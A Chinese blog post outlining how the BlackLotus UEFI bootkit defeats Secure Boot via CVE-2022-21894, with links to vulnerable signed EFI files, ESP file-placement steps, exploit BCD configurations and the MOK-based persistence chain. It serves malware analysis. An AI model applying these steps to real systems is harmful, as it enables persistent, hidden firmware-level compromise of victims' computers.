BlackLotus绕过SecureBoot概要流程

最新推荐文章于 2024-08-08 14:39:08 发布
最新推荐文章于 2024-08-08 14:39:08 发布
阅读量1.1k 收藏 21
点赞数 20
文章标签: blacklotus bootkit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_si_yan/article/details/136346815
版权

BlackLotus绕过SecureBoot概要流程

  • CVE-2022-21894 Baton Drop漏洞

  • 三个可利用的EFI文件,具有微软合法签名
    https://msdl.microsoft.com/download/symbols/bootmgfw.efi/7144BCD31C0000/bootmgfw.efi
    https://msdl.microsoft.com/download/symbols/bootmgr.efi/98B063A61BC000/bootmgr.efi
    https://msdl.microsoft.com/download/symbols/hvloader.efi/559F396411D000/hvloader.efi
    这三个文件已经被微软禁止访问、下载,未找到副本

  • 文件部署

    1. 重命名\EFI\Microsoft\Boot\bootmgfw.efi\EFI\Microsoft\Boot\winload.efi
    2. 未启用SecureBoot
      将Bootkit拷贝为\EFI\Microsoft\Boot\bootmgfw.efi
    3. 启用SecureBoot
      1. 在ESP分区根目录中创建\system32文件夹
      2. 将合法的具有微软签名的shim.efi(bootx64.efi)文件拷贝到\EFI\Microsoft\Boot\bootload.efi
      3. 将下载的bootmgfw.efi文件拷贝到\EFI\Microsoft\Boot\bootmgfw.efi
      4. 将下载的hvloader.efi文件拷贝到\system32\hvloader.efi
      5. 将下载的bootmgr.efi文件拷贝到\system32\bootmgr.efi
      6. 将可利用的BCD文件拷贝到\system32\BCD
      Windows Boot Manager
--------------------
identifier              {9dea862c-5cdd-4e70-acc1-f32b344d4795}
description             Windows Boot Manager
locale                  en-US
inherit                 {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
bootdebug               Yes
displayorder            {57e1b615-0355-11ec-abb0-005056c00008}
timeout                 30

Windows Boot Loader
-------------------
identifier              {57e1b615-0355-11ec-abb0-005056c00008}
device                  boot
path                    \system32\hvloader.efi
description             Hoy la disco se flota
locale                  en-US
inherit                 {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
truncatememory          0x10000000
avoidlowmemory          0x1000
nointegritychecks       Yes
testsigning             Yes
isolatedcontext         Yes
osdevice                boot
systemroot              \
ems                     Yes
      1. 将mcupdate_AuthenticAMD.dll文件拷贝到\system32\mcupdate_AuthenticAMD.dll
      2. 将mcupdate_GenuineIntel.dll文件拷贝到\system32\mcupdate_GenuineIntel.dll
      3. 重命名\EFI\Microsoft\Boot\BCD\EFI\Microsoft\Boot\BCDR,即备份BCD文件为BCDR
      4. 将可利用的BCD文件拷贝到\EFI\Microsoft\Boot\BCD,并修改HKEY_LOCAL_MACHINE\BCDLoadName\DescriptionKeyName的值为BCD00000000
      Windows Boot Manager
--------------------
identifier              {9dea862c-5cdd-4e70-acc1-f32b344d4795}
description             Windows Boot Manager
locale                  en-US
inherit                 {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
bootdebug               No
displayorder            {527f84fc-036e-11ec-abb0-005056c00008}
timeout                 30

Windows Boot Loader
-------------------
identifier              {527f84fc-036e-11ec-abb0-005056c00008}
device                  boot
path                    \system32\bootmgr.efi
description             RIP the woo
locale                  en-US
inherit                 {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
avoidlowmemory          0x10000000
bootdebug               No
isolatedcontext         Yes
custom:22000023         \system32\bcd
ems                     Yes
      1. 重启系统,实现将自签名证书加入MOK,绕过SecureBoot检测
      2. 系统启动时,启动链如下
      bootmgfw.efi -> BCD -> \system32\bootmgr.efi -> \system32\hvloader.efi -> \system32\mcupdate_GenuineIntel.dll -> MokInstallEfiApp
      检测ESP根目录下的\system32等相关文件是否存在,如果存在,则重命名\EFI\Microsoft\Boot\bootload.efi为\EFI\Microsoft\Boot\bootmgfw.efi
      13. 拷贝Bootkit到\EFI\Microsoft\Boot\grubx64.efi
      14. 恢复\EFI\Microsoft\Boot\BCDR\EFI\Microsoft\Boot\BCD
      15. 设置UEFI中的MokList变量,使得自签名的grubx64.efi绕过SecureBoot
      16. 删除\system32下的所有文件
      17. 重启系统,实现启动自签名模块grubx64.efi,进而在启动Windows系统时植入木马
      18. 系统启动时,启动链如下
      bootmgfw.efi -> grubx64.efi -> winload.efi -> BCD -> \Windows\System32\winload.efi -> Hook、Patch Kernel -> Install Malware
      1. 重启后,shim版的bootmgfw.efi启动Bootkit伪装的grubx64.efi,成功绕过SecureBoot
        随后,Bootkit伪装的grubx64.efi加载真正的winload.efi(即原始的bootmgfw.efi),进行Hook、Patch
        等操作后启动目标系统,实现持久化.

  • 参考连接
    BlackLotus 分析1–安装器阶段
    BlackLotus 分析2–boot-内核阶段
    BlackLotus 分析3–http_downloader
    BlackLotus UEFI bootkit: Myth confirmed
    Myth confirmed

_Noema
关注
BlackLotus UEFI Bootkit 对 Windows 11 系统构成严重威胁
code2day的博客
03-03 828
BlackLotus UEFI Bootkit 是一种恶意软件,它可以通过修改计算机的启动程序来控制计算机并窃取敏感信息。
Win7系统提示找不到mcupdate_GenuineIntel.dll文件的解决办法
file
01-08 882
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mcupdate_GenuineIntel.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.
mcupdate_genuineintel.dll修复宝典:Intel软件问题应对与修复技巧
Nebula_042的博客
08-08 535
遇到mcupdate_genuineintel.dll文件缺失导致应用程序或游戏无法启动的问题,通常意味着与Intel处理器相关的更新或验证组件缺失。下载并安装Intel Software Development Emulator或Intel Management Engine软件,这可能包含mcupdate_genuineintel.dll文件。确保你的Windows操作系统是最新的,因为某些更新可能包含了mcupdate_genuineintel.dll文件或其相关的修复。
NAPHLPR.DLL文件丢失导致程序无法运行问题
2301_76755223的博客
03-20 801
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个NAPHLPR.DLL文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现NAPHLPR.DLL丢失要怎么解决?
b85主板装服务器系统,B85主板+奔腾G3258完美安装Win10的方法!
weixin_39731107的博客
08-11 3788
去年的台北电脑展上,为了纪念奔腾处理器诞生20周年,Intel推出了开放超频的奔腾G3258处理器,这是Intel时隔多年对入门处理器首次开放超频选项。之后,奔腾G3258搭配B85主板超频,就成为DIY市场上十分走俏的平民玩家装机组合。不过,Windows 10出现之后(准确说是10130版之后,集成了某个补丁),很多玩家发现,使用G3258搭配B85主板竟然无法安装Windows 10系统。百...
启动应用程序出现mcupdate_GenuineIntel.dll找不到问题解决
wbcmbfy的博客
04-15 743
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mcupdate_GenuineIntel.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.
如何防护BlackLotus UEFI Bootkit
03-04
7. 使用UEFI Secure Boot功能,以确保系统启动时只加载可信的操作系统和驱动程序。 8. 使用UEFI BIOS密码和安全启动选项,以防止未经授权的访问和修改系统设置。 以上是一些防护BlackLotus UEFI Bootkit的措施,...
Online Signature-开源
05-02
变化日志文件(如changes (german) Blacklotus.txt)记录了软件的更新历史,帮助用户了解新版本的改进和修复内容。"online.exe"是程序的可执行文件,用户可以通过运行这个文件启动在线签名功能。"BACK.JPG"可能是...
微软将花近一年的时间才能修复这个 Secure Boot 0day漏洞
smellycat000的专栏
05-12 1016
聚焦源代码安全,网罗国内外最新资讯!作者:ANDREW CUNNINGHAM编译:代码卫士微软在本月补丁星期二发布补丁,修复了ESET公司研究员所发现的遭 BlackLotus bootkit 利用的 Secure Boot 绕过漏洞 CVE-2023-24932。最初的漏洞编号是CVE-2022-21894,已在今年1月份修复,而本次发布的补丁修复的是运行 Windows 10 和 11 版本...
Windbg内核调试(大杂烩)
sanshao27的专栏
04-21 7001
Windbg内核调试之三: 调试驱动这次我们通过一个实际调试驱动的例子,来逐步体会Windbg在内核调试中的作用.由于条件所限,大多数情况下,很多人都是用VMware+Windbg调试内核(VMware的确是个好东西).但这样的调试需要占用大量的系统资源,对于和我一样急性子的朋友来说这是不可接受的:).利用双机调试就可以让你一边喝咖啡一边轻松的看结果,而不至于郁闷的等待每次长达数分
调试通用驱动程序 - 分步(Echo 内核模式)
爱她就要努力
05-26 2844
本文档已存档,并且将不进行维护。 调试通用驱动程序 - 分步(Echo 内核模式) 本实验中引入了 WinDbg 内核调试器。 WinDbg 用于调试 Echo 内核模式的示例驱动程序代码。 实验目标 本实验包含以下练习:引入调试工具、介绍常见调试命令、阐述断点的用法,以及演示调试扩展的用法。 在本实验中,使用实时内核调试连接,以了解以下内容: 使用 Windows 调
mcupdate详解
crazmer的博客
05-15 1028
mcupdate.exe是McAfee网络安全套装相关程序,该进程会连接到McAfee服务器进行病毒特征库升级    进程文件: mcupdate or mcupdate.exe     进程名称: Mcupdate     进程类别:存在安全风险的进程     英文描述:     mcupdate.exe is a process associated with McAfee Inte
7系统内部系统组件禁止休眠_Win10系统极限优化教程 有安全需求的人群慎用
weixin_39990138的博客
11-27 2076
自Windows 10 V1709起微软越来越重视Windows的安全问题,不断的加固系统,以至于游戏掉帧严重,严重影响游戏心情。正值加入蓝点网编辑部第二天,特此分享并重新整理更新了本人去年中旬在贴吧上发布的文章。再次提醒性能和安全不可完全兼得,有安全需求的人群慎用,动手能力差的人群慎用本文分为两部分,分别为保证稳定及性能的驱动更新部分、减少安全设置性能下降的系统优化部分。下面进入正题驱动更新部分...
南京审计大学在陕西2020-2024各专业最低录取分数及位次表.pdf
10-27
那些年,与你同分同位次的同学都去了哪里?全国各大学在陕西2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
openjdk 1.8 带debug调试信息版本,可以查看标准库调试信息,在windows上运行 解压缩后直接使用
10-27
openjdk 1.8 带debug调试信息版本,可以查看标准库调试信息,在windows上运行 解压缩后直接使用
【Unity风格化滨海城市场景素材】Stylized Tuscany Seaside City
最新发布
10-27
文件名:Stylized Tuscany Seaside City.unitypackage Stylized Tuscany Seaside City 是一款为 Unity 开发的插件,专注于创建风格化的托斯卡纳海边城市场景。它提供了丰富的高质量美术资源和工具,帮助开发者快速构建充满地中海风情的城市环境,非常适合卡通、奇幻、冒险或模拟类游戏项目。以下是该插件的主要特点和功能介绍: 主要特点 高质量手绘模型: 插件包含大量手绘风格的 3D 模型,如托斯卡纳风格的房屋、商店、桥梁、灯塔、石墙、海边码头等,所有建筑和道具都细节丰富且具有浓厚的地中海风情。 定制化的城市构建: 插件提供模块化的建筑组件(如墙壁、窗户、门、屋顶等),允许开发者自由组合和构建独特的城市布局,打造不同风格的城镇、街道或港口。 海边环境: 包含海岸线、沙滩、码头、船只等与海边相关的场景元素,可以轻松创建一个美丽的海滨城市,带来明亮、轻松的氛围。 自然元素: 提供了多种植被资源,如橄榄树、柏树、灌木和花坛等,帮助营造出充满生机的自然环境,使场景更富有活力。 风格化材质: ......
582、基于51单片机protues仿真的模拟1-20楼电梯系统(仿真图、源代码)
10-27
582、基于51单片机protues仿真的模拟1-20楼电梯系统(仿真图、源代码) 该设计为基于51单片机protues仿真的模拟1-20楼电梯系统,实现8*8点阵和按键控制,1-20楼电梯模拟; 功能如下: 1、系统使用51单片机为核心设计; 2、8*8点阵显示楼层和方向; 3、按键控制电梯启动和楼层选择; 4、4*5矩阵键盘采集和控制显示; 5、模拟1-20楼电梯系统; 6、仿真图、源代码;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值